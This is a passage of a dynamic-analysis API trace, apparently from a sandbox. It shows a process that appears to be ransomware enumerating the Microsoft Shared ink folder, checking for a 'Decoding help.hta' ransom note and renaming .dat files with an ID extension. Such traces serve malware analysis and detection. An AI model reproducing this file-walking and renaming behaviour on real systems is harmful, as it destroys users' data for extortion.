lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR" [0050.064] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR\\*.*" [0050.064] GlobalMemoryStatus (in: lpBuffer=0x141dfd10 | out: lpBuffer=0x141dfd10) [0050.065] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x24ecef40, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x53c [0050.072] CloseHandle (hObject=0x53c) returned 1 [0050.072] FindNextFileW (in: hFindFile=0x5db4f8, lpFindFileData=0x141dfd30 | out: lpFindFileData=0x141dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hu-HU", cAlternateFileName="")) returned 1 [0050.072] lstrcmpW (lpString1=".", lpString2="hu-HU") returned -1 [0050.072] lstrcmpW (lpString1="..", lpString2="hu-HU") returned -1 [0050.072] lstrcmpiW (lpString1="windows", lpString2="hu-HU") returned 1 [0050.075] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0050.075] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0050.075] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="hu-HU" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU" [0050.075] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU\\*.*" [0050.075] GlobalMemoryStatus (in: lpBuffer=0x141dfd10 | out: lpBuffer=0x141dfd10) [0050.075] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x24f17078, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x53c [0050.085] CloseHandle (hObject=0x53c) returned 1 [0050.085] FindNextFileW (in: hFindFile=0x5db4f8, lpFindFileData=0x141dfd30 | out: lpFindFileData=0x141dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ece8572, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x2ece8572, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x2ea60e45, ftLastWriteTime.dwHighDateTime=0x1ca03fa, nFileSizeHigh=0x0, nFileSizeLow=0xb620, dwReserved0=0x0, dwReserved1=0x0, cFileName="hwrcommonlm.dat", cAlternateFileName="")) returned 1 [0050.085] lstrcpyW (in: lpString1=0x10d46aa0, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0050.085] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0050.085] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" [0050.085] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\decoding help.hta")) returned 0x1 [0050.085] lstrcmpiW (lpString1="Decoding help.hta", lpString2="hwrcommonlm.dat") returned -1 [0050.085] lstrlenW (lpString="hwrcommonlm.dat") returned 15 [0050.085] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0050.085] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0050.085] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="hwrcommonlm.dat" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrcommonlm.dat") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrcommonlm.dat" [0050.085] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrcommonlm.dat" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrcommonlm.dat") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrcommonlm.dat" [0050.085] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrcommonlm.dat", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrcommonlm.dat.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrcommonlm.dat.[ID]g9uZrLhJaygpwRm1[ID]" [0050.085] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrcommonlm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrcommonlm.dat"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrcommonlm.dat.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrcommonlm.dat.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0050.086] FindNextFileW (in: hFindFile=0x5db4f8, lpFindFileData=0x141dfd30 | out: lpFindFileData=0x141dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e0df36a, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaabda5f8, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e0df36a, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="HWRCustomization", cAlternateFileName="HWRCUS~1")) returned 1 [0050.086] lstrcmpW (lpString1=".", lpString2="HWRCustomization") returned -1 [0050.086] lstrcmpW (lpString1="..", lpString2="HWRCustomization") returned -1 [0050.086] lstrcmpiW (lpString1="windows", lpString2="HWRCustomization") returned 1 [0050.089] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0050.089] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0050.089] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="HWRCustomization" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\HWRCustomization") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\HWRCustomization" [0050.089] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\HWRCustomization", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\HWRCustomization\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\HWRCustomization\\*.*" [0050.089] GlobalMemoryStatus (in: lpBuffer=0x141dfd10 | out: lpBuffer=0x141dfd10) [0050.089] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x24f671b8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x53c [0050.095] CloseHandle (hObject=0x53c) returned 1 [0050.095] FindNextFileW (in: hFindFile=0x5db4f8, lpFindFileData=0x141dfd30 | out: lpFindFileData=0x141dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f7eaa54, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x2f7eaa54, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x2f301d57, ftLastWriteTime.dwHighDateTime=0x1ca03fa, nFileSizeHigh=0x0, nFileSizeLow=0xb6710, dwReserved0=0x0, dwReserved1=0x0, cFileName="hwrenalm.dat", cAlternateFileName="")) returned 1 [0050.095] lstrcpyW (in: lpString1=0x10d46aa0, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0050.095] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0050.095] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" [0050.095] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\decoding help.hta")) returned 0x1 [0050.095] lstrcmpiW (lpString1="Decoding help.hta", lpString2="hwrenalm.dat") returned -1 [0050.095] lstrlenW (lpString="hwrenalm.dat") returned 12 [0050.095] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0050.095] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0050.095] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="hwrenalm.dat" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrenalm.dat") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrenalm.dat" [0050.095] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrenalm.dat" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrenalm.dat") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrenalm.dat" [0050.095] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrenalm.dat", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrenalm.dat.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrenalm.dat.[ID]g9uZrLhJaygpwRm1[ID]" [0050.095] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrenalm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrenalm.dat"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrenalm.dat.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrenalm.dat.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0051.512] FindNextFileW (in: hFindFile=0x5db4f8, lpFindFileData=0x141dfd30 | out: lpFindFileData=0x141dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x33535c00, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x33535c00, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x332fa78d, ftLastWriteTime.dwHighDateTime=0x1ca03fa, nFileSizeHigh=0x0, nFileSizeLow=0xc7240, dwReserved0=0x0, dwReserved1=0x0, cFileName="hwrenclm.dat", cAlternateFileName="")) returned 1 [0051.513] lstrcpyW (in: lpString1=0x5c301e8, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0051.513] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0051.513] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" [0051.513] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\decoding help.hta")) returned 0x1 [0051.513] lstrcmpiW (lpString1="Decoding help.hta", lpString2="hwrenclm.dat") returned -1 [0051.513] lstrlenW (lpString="hwrenclm.dat") returned 12 [0051.513] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0051.513] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0051.513] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="hwrenclm.dat" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrenclm.dat") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrenclm.dat" [0051.513] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrenclm.dat" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrenclm.dat") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrenclm.dat" [0051.513] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrenclm.dat", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrenclm.dat.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrenclm.dat.[ID]g9uZrLhJaygpwRm1[ID]" [0051.513] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrenclm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrenclm.dat"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrenclm.dat.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrenclm.dat.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0051.513] FindNextFileW (in: hFindFile=0x5db4f8, lpFindFileData=0x141dfd30 | out: lpFindFileData=0x141dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32bd661d, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x32bd661d, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x32a7f9d8, ftLastWriteTime.dwHighDateTime=0x1ca03fa, nFileSizeHigh=0x0, nFileSizeLow=0x10ca50, dwReserved0=0x0, dwReserved1=0x0, cFileName="hwrlatinlm.dat", cAlternateFileName="")) returned 1 [0051.513] lstrcpyW (in: lpString1=0x5c301e8, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0051.513] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0051.513] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" [0051.513] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\decoding help.hta")) returned 0x1 [0051.514] lstrcmpiW (lpString1="Decoding help.hta", lpString2="hwrlatinlm.dat") returned -1 [0051.514] lstrlenW (lpString="hwrlatinlm.dat") returned 14 [0051.514] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0051.514] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0051.514] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="hwrlatinlm.dat" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrlatinlm.dat") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrlatinlm.dat" [0051.514] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrlatinlm.dat" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrlatinlm.dat") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrlatinlm.dat" [0051.514] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrlatinlm.dat", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrlatinlm.dat.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrlatinlm.dat.[ID]g9uZrLhJaygpwRm1[ID]" [0051.514] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrlatinlm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrlatinlm.dat"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrlatinlm.dat.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrlatinlm.dat.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0051.514] FindNextFileW (in: hFindFile=0x5db4f8, lpFindFileData=0x141dfd30 | out: lpFindFileData=0x141dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3d94dbb3, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x3d94dbb3, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x3c28ab1e, ftLastWriteTime.dwHighDateTime=0x1ca03fa, nFileSizeHigh=0x0, nFileSizeLow=0x2e99a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hwruklm.dat", cAlternateFileName="")) returned 1 [0051.514] lstrcpyW (in: lpString1=0x5c301e8, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0051.514] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0051.514] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" [0051.514] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\decoding help.hta")) returned 0x1 [0051.514] lstrcmpiW (lpString1="Decoding help.hta", lpString2="hwruklm.dat") returned -1 [0051.514] lstrlenW (lpString="hwruklm.dat") returned 11 [0051.514] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0051.514] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0051.514] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="hwruklm.dat" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruklm.dat") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruklm.dat" [0051.514] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruklm.dat" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruklm.dat") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruklm.dat" [0051.515] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruklm.dat", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruklm.dat.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruklm.dat.[ID]g9uZrLhJaygpwRm1[ID]" [0051.515] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruklm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwruklm.dat"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruklm.dat.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwruklm.dat.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0052.282] FindNextFileW (in: hFindFile=0x5db4f8, lpFindFileData=0x141dfd30 | out: lpFindFileData=0x141dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3da5853e, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x3da5853e, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x3d7f6f6e, ftLastWriteTime.dwHighDateTime=0x1ca03fa, nFileSizeHigh=0x0, nFileSizeLow=0x21ff00, dwReserved0=0x0, dwReserved1=0x0, cFileName="hwruksh.dat", cAlternateFileName="")) returned 1 [0052.282] lstrcpyW (in: lpString1=0x114950c8, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0052.282] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0052.282] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" [0052.282] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\decoding help.hta")) returned 0x1 [0052.282] lstrcmpiW (lpString1="Decoding help.hta", lpString2="hwruksh.dat") returned -1 [0052.282] lstrlenW (lpString="hwruksh.dat") returned 11 [0052.282] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0052.282] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0052.282] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="hwruksh.dat" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruksh.dat") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruksh.dat" [0052.282] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruksh.dat" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruksh.dat") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruksh.dat" [0052.282] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruksh.dat", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruksh.dat.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruksh.dat.[ID]g9uZrLhJaygpwRm1[ID]" [0052.282] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruksh.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwruksh.dat"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruksh.dat.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwruksh.dat.[id]g9uzrlhjaygpwrm1[id]")) returned 0 